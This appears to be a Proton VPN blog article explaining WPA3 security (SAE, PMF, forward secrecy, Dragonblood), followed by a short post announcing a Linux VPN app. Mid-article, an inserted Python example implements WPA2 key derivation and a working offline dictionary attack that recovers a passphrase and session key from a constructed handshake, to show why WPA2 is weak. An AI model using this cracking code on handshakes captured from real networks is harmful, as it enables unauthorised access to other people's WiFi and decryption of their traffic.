With some 19.6 billion WiFi-capable devices currently in use, the need for secure WiFi is  clear. Let’s look at how your devices are designed to keep you safe.

WPA3 — a history

The Wired Equivalent Privacy (WEP) security algorithm, introduced in 1997, was part of the original IEEE 802.11 standard that defined how WiFi networks operate. Unfortunately, it quickly became clear that WEP was fatally flawed: it used the RC4 stream cipher with short initialization vectors that were frequently reused, so an attacker who captured enough traffic could recover the network key. 

In 2003, the nonprofit Wi-Fi Alliance®  officially announced WEP’s successor, the Wi-Fi Protected Access (WPA) standard, followed in 2004 by WPA2. WPA2 was considered secure until 2017, despite increasing concerns over its failure to provide perfect forward secrecy.

In 2017, researchers Mathy Vanhoef and Frank Piessens published a paper showing that all WPA and WPA2 networks were vulnerable to key reinstallation attacks. By replaying messages of the 4-way handshake, an attacker could force a device to reuse cryptographic nonces, and could then decrypt, replay, and in some configurations inject packets, exposing any data that wasn’t separately encrypted, for example by a VPN or HTTPS (which was much less common in 2017 than it is now). The only real limitation of this so-called KRACK attack was that the hacker had to be within radio range of the target WiFi network.   

The Wi-Fi Alliance and device vendors rushed to patch the problem, but since a huge number of old routers remain in use, even WEP remains worryingly common more than 20 years after it was declared unfit for purpose, and billions of unpatched WPA2 routers remain in use. 

Fortunately (and much more successfully), Windows, macOS, Linux, Android, and iOS/iPadOS have all been patched to protect against KRACK.  

Nevertheless, few people were surprised when, in 2018, the Wi-Fi Alliance announced a new WiFi security certification, WPA3. 

What is WPA3?

WPA3 defines an amalgam of security standards. Some of these are mandatory and must be implemented for a device to display a Wi-Fi CERTIFIED™ sticker. Some standards are recommended for use with WPA3 but are not required for WPA3 certification. We’ll come to these later.

The  Wi-Fi CERTIFIED™ logo

WPA3 includes many small improvements over WPA2 — far too many to detail here. However, the key improvements are:

Protected Management Frames (PMF)

Management frames play an important role in the underlying structure of wireless networking — notably in authenticating and deauthenticating devices. With PMF (IEEE 802.11w), these management frames are integrity-protected, and unicast ones encrypted, so a device can reject forged frames. This provides protection against a number of threats, including:

  • Disconnect attacks (also known as Wi-Fi deauthentication attacks) — A type of denial-of-service attack that disconnects a device from the WiFi network by sending forged deauthentication frames that appear to come from the access point. Disconnect attacks are often used to facilitate other kinds of attack, such as…
  • Honeypot and Evil twin attacks — These attacks attempt to trick you into connecting to malicious WiFi networks (for example, right after you have been forcibly disconnected from the real one), so a hacker can snoop on your otherwise unencrypted browsing traffic. 

Improved password security

One of the central design goals behind WPA3 addresses the biggest problem with WiFi security: people use weak, easily guessed passwords to protect their WiFi networks. And with WPA2, even if you have changed your password to something genuinely secure, a hacker who records a single 4-way handshake can test an unlimited number of guesses against it offline, without ever contacting the router again. 

Known as a dictionary attack (itself a form of brute force attack), this uses specialized password-cracking software, usually running on GPUs, to test millions of candidate passwords per second against the captured handshake until the correct one is found. 

WPA3 mitigates such attacks with the Simultaneous Authentication of Equals (SAE) handshake, a password-authenticated key exchange in which an attacker can test only one password guess per live exchange with the router, and in which a recorded handshake is useless for offline guessing.

This means that for every incorrect guess, the hacker must run a fresh handshake with the target WiFi network, making dictionary attacks impractical. An access point can also throttle or flag a client after a certain number of failed attempts. 

Perfect forward secrecy

A major problem with WPA2-Personal is that it doesn’t provide perfect forward secrecy. Its session keys are derived from the network passphrase plus values exchanged in the clear during the handshake, so if the passphrase is ever compromised, a hacker who recorded earlier traffic can decrypt all of it retroactively. Anyone can therefore collect encrypted WiFi traffic today and decrypt it later, once the passphrase becomes available. 

The Simultaneous Authentication of Equals handshake used by WPA3 solves this problem. Based on a Diffie–Hellman style key exchange (the Dragonfly protocol), it produces a fresh, unique master key for each WiFi session, so learning the passphrase later does not reveal the keys of past sessions. 

Learn more about perfect forward secrecy
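Both of the WPA2 weaknesses above (offline dictionary attacks and the lack of forward secrecy) come from the same fact: the master key is a deterministic function of the passphrase and SSID, and everything else that goes into the session keys is sent in the clear. The following is an added example, not code from this page or from Proton VPN. It implements the real WPA2-Personal key derivation (PBKDF2-HMAC-SHA1 for the master key, the IEEE 802.11 PRF for the session key, and the HMAC-SHA1 MIC on handshake message 2) with only the standard library, then runs a dictionary attack against a handshake it constructs itself. The MAC addresses, nonces, passphrase, wordlist, and the simplified EAPOL frame are all constructed for the example.

```python
import hashlib
import hmac
import os


def wpa2_pmk(passphrase, ssid):
    """WPA2-Personal master key: PBKDF2-HMAC-SHA1 over the passphrase, salted with the SSID,
    4096 rounds, 256 bits. Deterministic: the same passphrase and SSID always give the same PMK."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ieee80211_prf(key, label, data, nbytes):
    """IEEE 802.11 PRF-n: concatenated HMAC-SHA1(key, label || 0x00 || data || counter)."""
    out = b""
    counter = 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([counter]), hashlib.sha1).digest()
        counter += 1
    return out[:nbytes]


def wpa2_ptk(pmk, ap_mac, client_mac, anonce, snonce):
    """Pairwise transient key for CCMP (48 bytes: KCK | KEK | TK). Every input except the
    PMK travels in the clear during the 4-way handshake."""
    data = (min(ap_mac, client_mac) + max(ap_mac, client_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return ieee80211_prf(pmk, b"Pairwise key expansion", data, 48)


def eapol_mic(kck, eapol_frame):
    """MIC over handshake message 2 (WPA2/CCMP): HMAC-SHA1 truncated to 128 bits."""
    return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]


def make_capture(passphrase, ssid):
    """Constructed stand-in for a sniffed 4-way handshake (messages 1 and 2). The EAPOL
    frame here is a simplified placeholder with the MIC field zeroed, not a real frame."""
    ap_mac, client_mac = bytes.fromhex("02aabbccdd01"), bytes.fromhex("02aabbccdd02")
    anonce, snonce = os.urandom(32), os.urandom(32)
    eapol_frame = b"\x01\x03\x00\x5f\x02\x01\x0a\x00\x10" + bytes(8) + snonce + bytes(54)
    ptk = wpa2_ptk(wpa2_pmk(passphrase, ssid), ap_mac, client_mac, anonce, snonce)
    return {"ssid": ssid, "ap_mac": ap_mac, "client_mac": client_mac,
            "anonce": anonce, "snonce": snonce,
            "eapol_frame": eapol_frame, "mic": eapol_mic(ptk[:16], eapol_frame)}


def crack_wpa2(capture, wordlist):
    """Offline dictionary attack: each guess is checked against the recorded MIC with no
    further contact with the network. Returns the passphrase, or None if not in the list."""
    for guess in wordlist:
        ptk = wpa2_ptk(wpa2_pmk(guess, capture["ssid"]), capture["ap_mac"],
                       capture["client_mac"], capture["anonce"], capture["snonce"])
        if hmac.compare_digest(eapol_mic(ptk[:16], capture["eapol_frame"]), capture["mic"]):
            return guess
    return None


def session_tk(passphrase, capture):
    """No forward secrecy: with the passphrase and the recorded nonces, the temporal key that
    encrypted every data frame of that session is recomputed, so old captures decrypt."""
    ptk = wpa2_ptk(wpa2_pmk(passphrase, capture["ssid"]), capture["ap_mac"],
                   capture["client_mac"], capture["anonce"], capture["snonce"])
    return ptk[32:48]


if __name__ == "__main__":
    cap = make_capture("correct horse battery staple", "HomeNet")
    found = crack_wpa2(cap, ["123456", "password", "correct horse battery staple"])
    print("recovered passphrase:", found)
    print("session temporal key:", session_tk(found, cap).hex())
```

Nothing in `crack_wpa2` touches the network, which is the whole point: the cost of each guess is one PBKDF2 run, and the router never sees the attempts. Under SAE the equivalent check cannot be written, because a guess can only be tested by completing a live Dragonfly exchange with the access point, and the recorded exchange does not let you verify guesses offline.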

WPA3 versions

There are two WPA3 standards tailored for different situations: personal and enterprise.

WPA3-Personal

Designed for home use, WPA3-Personal emphasizes convenience over maximum security. Like WPA2, it uses AES-128 encryption in CCM mode (CCMP), which both authenticates and encrypts the connection. Unlike WPA2, it requires the SAE handshake, which prevents offline brute force attacks and therefore also provides perfect forward secrecy. 

Learn more about AES encryption

WPA3-Enterprise

Aimed at businesses, governments, and financial institutions, WPA3-Enterprise offers improved security at the cost of some convenience. For example, WPA3-Enterprise requires additional infrastructure to deploy, including an authentication server to handle device authentication and key management.

As with WPA3-Personal, the use of Protected Management Frames is mandatory (it’s only the WPA3/WPA2 compatibility mode, discussed below, in which PMF is merely optional). 

For businesses that require additional security, WPA3-Enterprise offers an optional “192-bit security mode”, that uses AES-256 encryption in GCM mode (GCMP-256) to secure data and authenticate the connection. Like CCM, GCM is an authenticated-encryption mode, but it is faster in hardware and is used here with a 256-bit key.

The 192-bit mode also uses elliptic curve cryptography on a 384-bit curve (P-384), for both the ECDH key exchange and ECDSA signatures, which is noted for being both fast and secure. To validate the handshake, it uses HMAC-SHA-384, and Protected Management Frames must use a higher level of protection: 256 bits (BIP-GMAC-256). 

In addition to PMF and SAE, the original WPA3 proposal included two standards that were dropped from the final WPA3 certification program. 

Wi-Fi Enhanced Open

Wi-Fi Enhanced Open uses Opportunistic Wireless Encryption (OWE) to greatly improve the security of public WiFi networks, mitigating many of the dangers associated with operating an open network. Each client negotiates its own encryption key with the access point, so other users of the hotspot can no longer sniff your traffic, while keeping the convenience of connecting without a password. Note that OWE does not authenticate the access point, so it does nothing against an evil twin hotspot; for that you still need HTTPS or a VPN.

Wi-Fi Easy Connect 

A replacement for the wildly unsafe Wi-Fi Protected Setup (WPS), which let you connect to a router at the push of a button, Wi-Fi Easy Connect lets you easily provision a device by scanning a QR code or NFC tag. As a nice bonus, the provisioned connection will persist even if the WiFi password is changed. 

A missed opportunity?

Both these standards are available with their own certification schemes, but not including them in WPA3 was viewed as a mistake by some. This was made worse by the fact that WPA3’s increased encryption key standards are only an optional feature of WPA3-Enterprise certification.

As Mathy Vanhoef, the PhD researcher who discovered the KRACK vulnerability in WPA2 noted:

“Unfortunately, the WPA3 certification program only mandates support of the new dragonfly handshake. That’s it. The other features are either optional, or a part of other certification programs. I fear that in practice this means manufacturers will just implement the new handshake, slap a ‘WPA3 certified’ label on it, and be done with it”.

To be fair to the Wi-Fi Alliance, it wanted a quick uptake of the new standard from manufacturers for security reasons, and was no doubt keen to make the transition as painless for them as possible.

To some extent, Vanhoef’s prediction has become true — there are many devices out there which only support the minimal WPA3 specification. However, there are also many higher-end devices that support the full range of Wi-Fi Alliance certifications.  

Known weaknesses

In 2019, Vanhoef and Eyal Ronen published a group of vulnerabilities that they collectively termed Dragonblood (referencing the Dragonfly key exchange, of which SAE is a variant). These included downgrade attacks, which exploit the fact that WPA3 is usually deployed alongside WPA2 for backward compatibility: a hacker can trick targets into connecting to a dummy router that only offers WPA2, capture the resulting WPA2 handshake, and brute force it offline. They also included timing and cache-based side channels in the Dragonfly handshake itself that leak information about the password.

The Wi-Fi Alliance quickly announced the issue patched, but a follow-up paper (co-authored again by Vanhoef) demonstrated that the initial countermeasures were “insufficient”, as side channels remained in patched implementations. 

It remains unclear if WPA3, when run in compatibility mode (see below), is still vulnerable in 2023 to Dragonblood-style downgrade attacks, but devices set to use only WPA3-Personal or WPA3-Enterprise shouldn’t be vulnerable to them.  

How to use WPA3 on your router

To achieve a WPA3 connection, both the router and the device connecting to the router must use WPA3. Most routers built from around 2020 support WPA3, but people tend not to upgrade their routers often. 

There are consequently a huge number of older routers still in use that do not support WPA3. In addition to this, the huge popularity of IoT devices, many of which still use WPA2, has hindered the widespread adoption of WPA3. 

In theory, manufacturers can push firmware updates to older routers, allowing them to support WPA3. In practice, not all manufacturers do this (and certainly not for their whole back-catalog of router models). And even when they do, few people routinely update their router’s firmware.

To see if your router supports WPA3, log in to its admin page (typically by entering the local IP address 192.168.0.1 or 192.168.1.1 into your browser’s URL bar while connected to the router), and locate your router’s wireless security settings.

Select a WPA3 WiFi mode

Most routers aimed at the domestic market default to a WPA3/WPA2 compatibility mode so that older WPA2-only devices can also seamlessly connect to them. Most domestic routers don’t support WPA3-Enterprise, as it’s not necessary for home use and requires additional infrastructure (an authentication server) to deploy.

If your router doesn’t support WPA3, then it’s probably time to get another router. You can then connect it to the (likely low-quality) router/modem (set to run in modem-only mode) provided by your ISP. 

Final thoughts

WPA3 greatly improves on the WiFi security offered by WPA2, with no real downsides. However, nothing is perfect, and WPA3 is no exception. In particular, using WPA3/WPA2 compatibility mode forfeits most of the advantages of using WPA3, since an attacker can simply steer devices toward the WPA2 side. 

Of wider concern is the fact that standards bodies such as the Wi-Fi Alliance are dominated by vendors who have a vested interest in preventing their unsold and recently sold hardware becoming obsolete. 

Fortunately, the almost ubiquitous uptake of HTTPS over the last few years provides a strong second layer of security when using WiFi to connect to the internet, making the dangers associated with using public hotspots largely a thing of the past. 

Learn more about how HTTPS keeps you safe online


Introducing the new Proton VPN Linux app https://protonvpn.com/blog/vpn-linux-app/ Tue, 07 Nov 2023 10:59:41 +0000 https://protonvpn.com/blog/?p=7480 For over two years, Proton VPN has been one of a very few VPN services to offer a full Linux app with a graphic user…

The post Introducing the new Proton VPN Linux app appeared first on Proton VPN Blog.

For over two years, Proton VPN has been one of a very few VPN services to offer a full Linux app with a graphic user interface. After listening to our passionate and highly engaged community of Linux users, we’re now pleased to announce our all-new Linux app.

Rebuilt from the ground up, the new Proton VPN Linux app is efficient, elegant, and modular in design, allowing us to easily add new features as we develop them.

The new Proton VPN Linux app

An advanced Linux VPN app

Our new Linux app comes packed with a range of advanced VPN features:

  • NetShield Ad-blocker — A DNS filtering feature that blocks ads, trackers, and malware
  • Kill Switch — Ensures your real IP isn’t exposed if your VPN connection drops
  • VPN Accelerator —  Can increase VPN speeds by up to 400% over long distances
  • Moderate NAT — Can solve connection problems when playing multiplayer online games, or having video conversations using WebRTC
  • Port forwarding — Greatly improves P2P performance
  • Auto-connect at startup — Connect to your favorite VPN server on startup
  • Pin servers to tray — Provides a convenient way to connect to your favorite servers
  • OpenVPN DCO — Provides equivalent speed performance to WireGuard
  • Secure Core — A double VPN security solution where the first server is located only in countries with strong privacy laws

Which Linux distributions are supported?

Going forward, we will officially support the Linux app on the latest versions of Debian, Ubuntu, and Fedora. This will allow us to concentrate our energies on delivering the best possible experience for our Linux community.

The app may work with many other Linux distributions (especially ones based on Debian and Ubuntu), but support for using the app on unsupported distros may be limited.

Roadmap

One of the big advantages of our new app is its modular design, which makes it easier for us to develop and implement new features. Current plans include:

  • A command line interface — If you need this feature immediately, you can still use our old (v3) CLI tool.
  • WireGuard — OpenVPN DCO produces identical speed performance to WireGuard, but we know this is a highly requested feature.

Become a Fedora package maintainer

We’re working on uploading the application to the official Fedora repositories, and are looking for community volunteers to support our mission to make privacy the default for everyone. If you’d like to be a Proton VPN package maintainer in the Fedora Project, please get in touch.

We’re excited about our new Linux app. It marks an important step forward in our support for Linux, an open-source operating system that respects your privacy. 

